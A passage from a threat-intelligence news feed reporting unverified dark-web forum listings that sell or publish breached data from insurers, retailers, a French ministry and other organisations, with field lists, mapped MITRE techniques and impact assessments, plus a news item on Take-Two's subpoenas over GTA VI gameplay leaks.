→](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=salt-mobile-2026-09-02&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=salt-mobile-2026-09-02&utm%5Fcontent=footer) // Threat Intelligence ### 3.1 Million DZI Records Offered With National ID and Passport Numbers URL: https://darkwebinformer.com/3-1-million-dzi-records-offered-with-national-id-and-passport-numbers/ Last updated: 2026-09-03T14:48:18.000Z Breach Report Bulgaria Insurance Price By Offer ## 3.1 Million DZI Records Offered With National ID and Passport Numbers A forum actor posting as **Intelligence** is selling what they describe as **3,134,269 full personal data records** belonging to customers of **DZI Insurance**, Bulgaria's oldest insurer and a subsidiary of Belgium's KBC Group. The stated column list is unusually complete for an identity set: **national identity number, date of birth, passport number with its issue date and issuing authority, full names in both Cyrillic and Latin script, full postal address, email, up to two phone numbers, nationality and a foreign resident flag**. The actor dates the breach to **21 May 2026**, attributes it to **a poorly secured API on the customer portal**, and says the set will be **sold to only two buyers**, with more to follow. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records3,134,269 Breach dated21 May 2026 Sales limitTwo buyers ActorIntelligence ### ▣Post details TargetDZI Insurance ParentKBC Group CountryBulgaria SectorInsurance ListingSelling, price on request Volume3,134,269 records Stated sourceCustomer portal API ObservedSep 1, 2026 ### !What the post claims - 3,134,269 records - Breach dated 21 May 2026 - Poorly secured API cited - Customer portal named - Raw JSON files available - National identity numbers - Dates of birth - Passport numbers - Passport issue dates - Passport issuing authority - Names in Cyrillic and Latin - Full postal addresses - Email addresses - Up to two phone numbers - SMS contact flags - Nationality and residency flags - Individual or company flag - Further releases promised ### ◱Screenshot [ ![Forum listing selling an alleged DZI Insurance database of over three million Bulgarian records, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/97283657926359762357862938765987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/97283657926359762357862938765987235.png) Forum post offering DZI Insurance records for sale, observed 1 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Stated The actor attributes the extraction to an inadequately protected interface on the customer facing portal. No endpoint or flaw is described. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Raw JSON is offered alongside the tabular set, consistent with records pulled through an interface at volume rather than a database backup. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred The sample is posted inline and the sale is handled privately. The route out of the environment is not described. ### ⚠Potential impact The **national identity number is the identifier Bulgarian banking, healthcare and government all rely on**, it encodes date of birth and sex, and it is not something a citizen can change. Paired with a passport number, its issuing authority and a residential address, each record is **a complete and permanent identity kit** rather than a contact detail. At over three million records the set reaches **a substantial share of the adult population**, which makes the useful question not who is affected but which institutions still accept an identity number and a name as proof of identity. The **two buyer model cuts against wide circulation** but points toward deliberate exploitation by a small number of hands. ### iStatus Unverified The sample runs long and holds together, with **Cyrillic and Latin transliterations that correspond, plausible identifier formats and real Bulgarian localities**, which is laborious to fabricate at that length. Against that, the account is **brand new with a single post and no standing**, no price is published, and the limited sale plus promise of more is a familiar sales device. One detail deserves attention: the breach is dated **21 May, more than three months before this listing**, with no public notification apparent since, which in an EU jurisdiction is its own question. Dark Web Informer has **not retrieved the data and is not linking it**, and neither DZI nor its parent has publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=dzi-insurance-2026-09-01&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=dzi-insurance-2026-09-01&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=dzi-insurance-2026-09-01&utm%5Fcontent=footer) // Threat Intelligence ### ZeroGaspi Customer Records for 89,281 French Shoppers Sold for 70 Dollars URL: https://darkwebinformer.com/zerogaspi-customer-records-for-89-281-french-shoppers-sold-for-70-dollars/ Last updated: 2026-09-03T14:35:15.000Z Breach Report France Grocery Retail 70 USD ## ZeroGaspi Customer Records for 89,281 French Shoppers Sold for 70 Dollars A forum actor posting as **ksye** is selling what they describe as the customer database of **zerogaspi.fr**, a French retailer selling surplus and short dated groceries. The listing covers **89,281 records and is presented as one part of a larger set**, with the actor stating they obtained it on **1 September 2026**. The fields given are **email address, full name, mobile number, full postal address and order value**, and the published sample also carries a reference identifying the store or partner each order relates to. There are **no passwords, card details or account identifiers** in what is shown. The price is **70 dollars in Monero**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Records89,281 Price$70 ScopePart one Actorksye ### ▣Post details Targetzerogaspi.fr CountryFrance SectorGrocery retail ListingSelling, Monero only Volume89,281 in this part ObtainedStated as 1 Sep 2026 ObservedSep 3, 2026 Actorksye ### !What the post claims - 89,281 records in this part - Described as a partial set - Taken on 1 September 2026 - Email addresses - Full names - Mobile numbers - Full postal addresses - Street, postcode and city - Order values - Store or partner references - Sample published inline - Price of 70 US dollars - Monero only - Several contact channels given - No passwords in sample - No card data in sample - No account identifiers - No mechanism described ### ◱Screenshot [ ![Forum listing selling an alleged ZeroGaspi customer database of 89,281 records, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/92873562876582359678259786239578623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/92873562876582359678259786239578623.png) Forum post offering ZeroGaspi customer records for sale, observed 3 September 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred A uniform column set across tens of thousands of rows, including order values and store references, points to an export from the order system rather than data scraped from a public page. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred The sample is posted inline and the sale is arranged through several messaging services. The route out of the environment is not described. ### ⚠Potential impact Name, mobile number, delivery address and order value together are **everything needed for a convincing delivery or refund approach**, and the store reference in each row narrows it further by naming the local shop the customer actually used. The stated capture date matters: if the data was taken on **1 September it describes current customers**, not a stale list, so anyone contacted has a live order to reason about. At **70 dollars, and framed as only one part**, the set will circulate widely and more of it is likely to follow. ### iStatus Unverified The sample looks like real order data, with **postcodes matching their communes and the uneven formatting that hand entered addresses produce**, which is awkward to fabricate at length. Against that, the account is **three days old with no standing whatsoever**, no intrusion method or access route is given, and the partial framing means the advertised count cannot be checked against anything. Dark Web Informer has **not retrieved the data and is not linking the contact addresses**, and ZeroGaspi has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=zerogaspi-2026-09-03&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=zerogaspi-2026-09-03&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=zerogaspi-2026-09-03&utm%5Fcontent=footer) // Threat Intelligence ### Take-Two Narrows GTA 6 Leak Investigation as Hunt for Leakers Intensifies URL: https://darkwebinformer.com/take-two-narrows-gta-6-leak-investigation-as-hunt-for-leakers-intensifies/ Last updated: 2026-09-02T18:36:20.000Z Take-Two Interactive appears to be narrowing its investigation into the people responsible for leaking unreleased Grand Theft Auto VI gameplay, with new court filings showing the publisher is seeking increasingly targeted information from Discord. The company describes the investigation as “rapidly evolving and ongoing” as new information about the alleged leakers continues to emerge. ### Investigation Becomes More Targeted Take-Two returned to federal court on August 28 seeking a second DMCA subpoena directed at Discord. Unlike the company's earlier broad information requests, [TorrentFreak’s review of the new court filing](https://torrentfreak.com/take-two-says-gta-6-leak-probe-is-rapidly-evolving-wants-new-discord-demands-under-seal/?utm%5Fsource=chatgpt.com) shows that the latest subpoena focuses on specific people and communities that Take-Two believes may be connected to the leaked GTA VI material. Take-Two told the court it has now identified one additional Discord user, obtained further identifying information concerning a previously identified user, and gathered additional information about community servers named during its earlier investigation. The company is now seeking more targeted records associated with those accounts and servers. ### Take-Two Wants New Subpoena Kept Secret Take-Two has also asked the court to keep details of the latest Discord request under seal. The company argues that the filing contains sensitive information about an ongoing investigation into copyright infringement and the alleged misappropriation of confidential Take-Two information. According to the filing, publicly revealing what investigators have learned could alert the people behind the leaks to the progress of the investigation. Take-Two specifically warned that disclosure could give the alleged infringers an opportunity to delete or conceal evidence or take additional steps to avoid being identified. [The latest filing and Take-Two’s reasoning are detailed here](https://torrentfreak.com/take-two-says-gta-6-leak-probe-is-rapidly-evolving-wants-new-discord-demands-under-seal/?utm%5Fsource=chatgpt.com). The secrecy surrounding the new request is a significant change from Take-Two's first Discord subpoena, which was publicly accessible and exposed details about several accounts and community servers being examined. ### GTA 6 Gameplay Began Leaking in August The current investigation follows the unauthorized release of unreleased Grand Theft Auto VI gameplay beginning around August 18. An individual or group using the Cyberleek name began distributing clips that appeared to contain authentic gameplay from Rockstar's upcoming title. The footage quickly spread through X, Discord, YouTube, and other platforms despite copyright takedown efforts. [The Verge reported that Take-Two initially sought information from Microsoft and Discord](https://www.theverge.com/games/983323/grand-theft-auto-vi-gta-leaks-microsoft-discord-subpoenaed?utm%5Fsource=chatgpt.com) as it attempted to identify those connected to the leaked material. The publisher subsequently expanded its legal efforts to X and YouTube, using DMCA subpoenas to seek information associated with accounts believed to have distributed or facilitated access to the footage. ### YouTube Subpoena No Longer Needed Interestingly, Take-Two has now withdrawn one part of that effort. The company previously asked Google for information associated with three YouTube personas linked to leaked GTA VI videos. A federal judge requested additional information explaining the connection between the accounts and the copyrighted material. Take-Two initially began supplying additional details but later withdrew the request entirely. The company told the court that because its investigation was developing rapidly, it had determined that it [no longer needed the particular information requested from YouTube](https://torrentfreak.com/take-two-says-gta-6-leak-probe-is-rapidly-evolving-wants-new-discord-demands-under-seal/?utm%5Fsource=chatgpt.com). Take-Two reserved the ability to submit another request to Google later if circumstances change. The decision, combined with the more narrowly focused Discord subpoena, suggests investigators may have developed more useful leads elsewhere. ### Rockstar Calls Leaks “Heartbreaking” Rockstar Games publicly addressed the situation on August 26 after more than a week of leaked footage spreading online. The developer said having GTA VI gameplay exposed in this manner had been “heartbreaking” for its team and was not how it intended players to experience the game for the first time. Rockstar's response came shortly before the company released an official extended look at GTA VI. The studio also indicated that development was nearing completion and reiterated plans for the game's November 19, 2026 release. [Rockstar’s response to the leaks was reported by Game Developer](https://www.gamedeveloper.com/business/rockstar-games-heartbroken-by-grand-theft-auto-6-leaks?utm%5Fsource=chatgpt.com). ### Investigation Remains Active No individual has been publicly charged or formally identified by Take-Two as responsible for the GTA VI leaks. However, the latest court filing indicates that the investigation has progressed beyond simply identifying where leaked footage was reposted. Take-Two now says it has additional identifying information connected to specific Discord users and more intelligence concerning communities previously identified during the investigation. The company's attempt to keep those details secret also suggests it does not want the people under investigation to know exactly how much information has already been gathered. Whether the latest Discord records ultimately identify the original source of the GTA VI footage remains unknown, but Take-Two's court filings show that the hunt for those responsible is continuing and becoming considerably more focused. ### Israel Science and Technology Directory Files Published, Though Most of It Was Already Public URL: https://darkwebinformer.com/israel-science-and-technology-directory-files-published-though-most-of-it-was-already-public/ Last updated: 2026-09-02T16:59:05.000Z Breach Report Israel Public Web Directory Published Free ## Israel Science and Technology Directory Files Published, Though Most of It Was Already Public A forum actor posting as **weykofa** has published **16.2 MB across 450 files** attributed to **science.co.il**, the Israel Science and Technology Directory. The site is a **public catalogue of Israeli research centres, universities, companies, associations and government bodies**, organised by discipline. The itemised contents reflect that: embassy and bank contact details, university leadership emails and phones, venture fund and municipal contacts, and listings for government offices and ministers. Two categories stand apart from the published directory, namely **a small set of visitor log entries with addresses, hosts and dates, and a handful of legal documents**. The claim is **unverified**. Severity LOW [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Size16.2 MB Files450 Non public itemsFew Actorweykofa ### ▣Post details Targetscience.co.il CountryIsrael SectorPublic web directory ListingFree download Volume450 files, 16.2 MB Stated sourceNot described ObservedSep 2, 2026 Actorweykofa ### !What the post claims - 450 files, 16.2 MB - 91 embassy contact sets - 164 international banks - 12 volunteer organisations - 9 university presidents - 7 provosts - 8 vice presidents for research - 56 venture funds - 42 Israeli banks with codes - 29 company director listings - 30 ministers with party affiliations - 211 government offices - 252 cities - 53 municipalities - Emails, phones and fax numbers - 11 visitor log entries - 9 lawsuit documents - 2 court judgments ### ◱Screenshot [ ![Forum post publishing files attributed to the Israel Science and Technology Directory, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/798236592736598726359786235978293785.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/798236592736598726359786235978293785.png) Forum post publishing science.co.il files, observed 2 September 2026. ### ☷Mapped techniques The post describes no intrusion method. All entries are inferred from the artefacts, not stated. - Reconnaissance [T1594](https://attack.mitre.org/techniques/T1594/) Search victim owned websites Inferred The great majority of the itemised contents corresponds to material the site publishes as its function, which is obtainable without any access to the server. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred Visitor log entries and stored legal documents are not part of the public directory, so if genuine they came from the server rather than from the front end. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through links posted in the thread. ### ⚠Potential impact Almost everything itemised here is **information the site exists to publish**, so the practical effect is convenience rather than disclosure: an attacker gets a tidy, pre sorted contact list for embassies, ministries, municipalities and university leadership instead of having to compile one. That still has value for **targeted phishing against named officials**, particularly where personal rather than role based addresses are included. The genuinely non public elements are **a handful of visitor log entries and some stored legal documents**, and those, not the directory content, are what would indicate the server itself was reached. ### iStatus Unverified The listing reads as **an inventory of a website's contents rather than a database**, with no tables, user accounts, credentials or record counts of the kind a compromised application produces. The **"leaked" framing overstates what is described**, since a public directory being copied is not the same as a directory being breached, and only the log entries and legal files would suggest otherwise. The account is new with no standing, and Dark Web Informer has **not retrieved the files and is not linking them**. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=science-co-il-2026-09-02&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=science-co-il-2026-09-02&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=science-co-il-2026-09-02&utm%5Fcontent=footer) // Threat Intelligence ### French Ministry Staff Directory and Inspector Records Published Free URL: https://darkwebinformer.com/french-ministry-staff-directory-and-inspector-records-published-free/ Last updated: 2026-09-02T16:26:10.000Z Breach Report France Central Government Published Free ## French Ministry Staff Directory and Inspector Records Published Free A forum actor posting as **mondial**, crediting one collaborator, has published two datasets attributed to **developpement-durable.gouv.fr**, the domain of France's **Ministry for Ecological Transition**. The first is a staff directory of **8,166 accounts**, described as carrying **8,166 unique email addresses, 5,278 landlines, 3,642 mobile numbers, 4,849 staff reference numbers and 942 units or directorates**, with directory logins, organisational paths and office addresses. The second holds **14,656 records for certified controllers**, including names, dates of birth, approval and internal reference numbers, employing organisations and certification dates. The actor attributes access to **an API misconfiguration and an access control flaw** in a separate tool. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Controller records14,656 Staff accounts8,166 Units listed942 Actormondial ### ▣Post details Targetdeveloppement-durable.gouv.fr CountryFrance SectorCentral government ListingFree, reply to unlock VolumeTwo datasets Stated sourceAPI and access control flaws ObservedSep 2, 2026 Actormondial, with one other ### !What the post claims - Two datasets published - 14,656 controller records - 8,166 staff accounts - 8,166 unique email addresses - 5,278 landline numbers - 3,642 mobile numbers - 4,849 staff reference numbers - 942 units and directorates - Directory logins and identifiers - Organisational unit paths - Office street addresses - Names and salutations - Account verification flags - Controller dates of birth - Approval numbers - Employing organisations - Certification and notification dates - Active status flags ### ◱Screenshot [ ![Forum post publishing staff directory and controller records attributed to a French ministry domain, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/2873957298635982763549872635698762359687239875.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/2873957298635982763549872635698762359687239875.png) Forum post publishing ministry directory and controller data, observed 2 September 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Stated Two weaknesses are named by class: a misconfigured interface on an authentication host, and a missing authorisation check in a separate application. Neither is described in detail. - Discovery [T1087.002](https://attack.mitre.org/techniques/T1087/002/) Domain account discovery Inferred The staff dataset carries directory attributes including organisational unit paths and distinguished names, indicating an enumeration of the identity directory rather than a website export. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Two separate systems were drawn from, one holding staff identities and one holding the register of certified controllers. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through forum hosting behind a reply wall. The route out of the environment is not described. ### ⚠Potential impact There are no passwords here, so the risk is **impersonation rather than account takeover**. A directory listing every member of staff with their login, reference number, unit and desk phone is **an organisational chart of a ministry**, and it is the groundwork for internal style phishing that names the right person in the right directorate. The controller register is the sharper half: those are **named individuals whose approval carries regulatory weight**, published alongside their dates of birth and approval numbers, which supports impersonation of an inspector as well as fraud against the people themselves. ### iStatus Unverified The post is **more specific than most about how the data was reached**, naming two classes of weakness rather than simply asserting access, and the **per field counts** are the work of someone who has parsed the files rather than guessed at them. What is published is still **two sample rows**, which is not enough to establish scale or authenticity. The collaborator credited here also appears in a separate French claim posted the same day, which is worth tracking. Dark Web Informer has **not retrieved the files and is not linking them**, and the ministry has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=developpement-durable-2026-09-02&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=developpement-durable-2026-09-02&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=developpement-durable-2026-09-02&utm%5Fcontent=footer) // Threat Intelligence ### FNIM Sites Defaced and Databases Published After a Single Server Compromise URL: https://darkwebinformer.com/fnim-sites-defaced-and-databases-published-after-a-single-server-compromise/ Last updated: 2026-09-02T15:57:48.000Z Breach Report France Mutual Insurance Published Free ## FNIM Sites Defaced and Databases Published After a Single Server Compromise Three forum actors, led by one posting as **yiranet**, claim to have compromised the infrastructure of the **Fédération Nationale Indépendante des Mutuelles**, the French federation representing small and medium sized mutual insurers. The post states they obtained **remote code execution on a server hosting several websites** and **defaced four of them**, including the federation's main site, two billing subdomains and an associated organisation's site, offering public archive snapshots as evidence. A fifth site on the same server was **not defaced because their access was removed first, though they say its data was taken anyway**. Full SQL databases are published free through two file hosts. No record count or field list is given. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Sites defacedFour Sites affectedFive DistributionFree ActorsThree ### ▣Post details TargetFNIM CountryFrance SectorMutual insurance ListingFree download VolumeNot stated Stated sourceCode execution on a server ObservedSep 2, 2026 Actoryiranet, with two others ### !What the post claims - Remote code execution obtained - One server, several websites - Four sites defaced - Federation main site defaced - Two billing subdomains defaced - Associated body's site defaced - A fifth site on the same host - Access removed before defacing it - Data taken from it regardless - Full SQL databases published - Two file hosts used - Archive snapshots given as proof - Three actors credited - No record count given - No field list given - No sample data published - No price, released free - Contact addresses given ### ◱Screenshot [ ![Forum post claiming compromise and defacement of French mutual insurance federation websites, September 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/9278356782359678239587235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/9278356782359678239587235.png) Forum post publishing FNIM databases and defacement claims, observed 2 September 2026. ### ☷Mapped techniques Mapped from the actors' own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Stated Code execution is claimed against a web server hosting several sites. No vulnerability or product is named. - Persistence [T1505.003](https://attack.mitre.org/techniques/T1505/003/) Web shell Stated The actors refer to their shell being removed before they could deface the last site, which indicates an interactive foothold was maintained on the host. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Complete SQL databases for the hosted sites are described as taken and are published in full. - Impact [T1491.002](https://attack.mitre.org/techniques/T1491/002/) External defacement Stated Four public sites were altered, with archive snapshots cited so the change can be checked after the fact. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through two public file hosts linked from the post. ### ⚠Potential impact Mutuelles are **health insurers**, so any member data held by the federation or its associated bodies falls into a sensitive category, though nothing published so far demonstrates what the databases actually contain. The **billing subdomains are the part to look at first**, since invoicing systems tie named organisations to payment records and bank details. The single host is the structural problem: **five sites belonging to more than one organisation sat on one server**, so a single foothold reached all of them, and each affected body has to assess its own exposure separately. ### iStatus Unverified The **defacement element is unusually checkable**, because public archive snapshots preserve what those pages looked like at a given moment, so that part of the claim can be tested independently rather than taken on trust. The **database claim has none of that support**: no record count, no schema, no sample and no description of contents beyond the word "everything". Dark Web Informer has **not retrieved the files and is not linking them**, nor the contact addresses, and FNIM has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fnim-2026-09-02&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fnim-2026-09-02&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=fnim-2026-09-02&utm%5Fcontent=footer) // Threat Intelligence ### Pattons Shipping Records Published Free With Goods Values and Delivery Details URL: https://darkwebinformer.com/pattons-shipping-records-published-free-with-goods-values-and-delivery-details/ Last updated: 2026-09-02T15:18:14.000Z Breach Report Australia Freight and Logistics Published Free ## Pattons Shipping Records Published Free With Goods Values and Delivery Details A forum actor posting as **Keishell**, crediting two others, has published what they describe as the **myTnT shipment database belonging to pattons.com.au**, an Australian business. The data is the company's **carrier portal records rather than anything belonging to the carrier itself**. The field list runs to more than twenty five items, covering **shipping account numbers, booking and tracking references, sender and recipient names, companies, emails, phones and full postal addresses, tax identifiers, goods descriptions and declared values, weights, shipment dates, delivery status, pricing, payment terms and invoice numbers, customs data, Incoterms and dangerous goods codes**. A spreadsheet is offered as proof of access. No record count is given. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) RecordsNot stated Field types25+ DistributionFree ActorKeishell ### ▣Post details Targetpattons.com.au CountryAustralia SectorFreight and logistics ListingFree download VolumeNot stated Stated sourceCarrier portal account ObservedAug 31, 2026 ActorKeishell ### !What the post claims - Shipping account numbers - Booking and shipment numbers - Tracking information - Full names - Company names - Email addresses - Phone numbers - Full postal addresses - VAT and tax identifiers - Goods descriptions - Declared goods values - Package weights and volumes - Shipment dates - Delivery status - Pricing and billing data - Payment terms - Invoice numbers - Customs information - Incoterms - Dangerous goods codes - Return shipment details - Collection and delivery instructions ### ◱Screenshots [ ![Forum post publishing shipment records attributed to an Australian company's carrier portal account, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/149782357682353987623876587623987515.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/149782357682353987623876587623987515.png) [ ![Spreadsheet offered in the same post as proof of access, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/149782357682353987623876587623987516.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/09/149782357682353987623876587623987516.png) Forum post publishing Pattons shipment records, observed 31 August 2026. ### ☷Mapped techniques The post describes no intrusion method. All entries are inferred from the artefacts, not stated. - Initial access [T1078](https://attack.mitre.org/techniques/T1078/) Valid accounts Inferred The data is scoped to one customer's shipping account rather than to the carrier as a whole, which points to access to that account rather than to the platform behind it. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred The proof image is a filtered spreadsheet view with column headers intact, consistent with an export function used at scale rather than records copied by hand. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through a public file host linked from the post. The route out of the environment is not described. ### ⚠Potential impact Shipment records answer **what is being moved, what it is worth, where it is collected and on what date**, which is the working brief for cargo theft, and the dangerous goods codes narrow that further to consignments worth intercepting. The billing side is the second problem: **invoice numbers, payment terms and pricing for named counterparties** are precisely what makes a fraudulent payment redirection convincing to an accounts department. Because a freight account records both ends of every movement, the exposure reaches **the company's customers and suppliers**, none of whom had any relationship with the portal. ### iStatus Unverified The proof image is **more useful than most**, showing an export with column headers, filter controls and the repetitive internal detail that real operational data carries. What it does not show is **scale**, since no record count appears anywhere, nor how the account was reached. Worth stating plainly for anyone reporting this: the records belong to **one company's carrier account, and nothing here indicates a compromise of the carrier**. Dark Web Informer has **not retrieved the file and is not linking it**, and the company has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=pattons-2026-08-31&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=pattons-2026-08-31&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=pattons-2026-08-31&utm%5Fcontent=footer) // Threat Intelligence ### 5.5 Million MyVete User Records Offered for 4,000 Dollars URL: https://darkwebinformer.com/5-5-million-myvete-user-records-offered-for-4-000-dollars/ Last updated: 2026-08-31T17:40:50.000Z Breach Report Veterinary Software 4,000 USD No Sample in Thread ## 5.5 Million MyVete User Records Offered for 4,000 Dollars A forum actor posting as **Kazu** is selling what they describe as a **2026 dump from MyVete**, a veterinary practice management platform used by animal clinics for patient records, appointments, billing and inventory. The listing gives **5,571,174 records described only as user personal data**, a total size of **30 GB** and a price of **4,000 dollars**. Unusually for a listing of this size, **no field list, schema or sample appears in the thread itself**; samples are offered through a private channel, and the descriptive 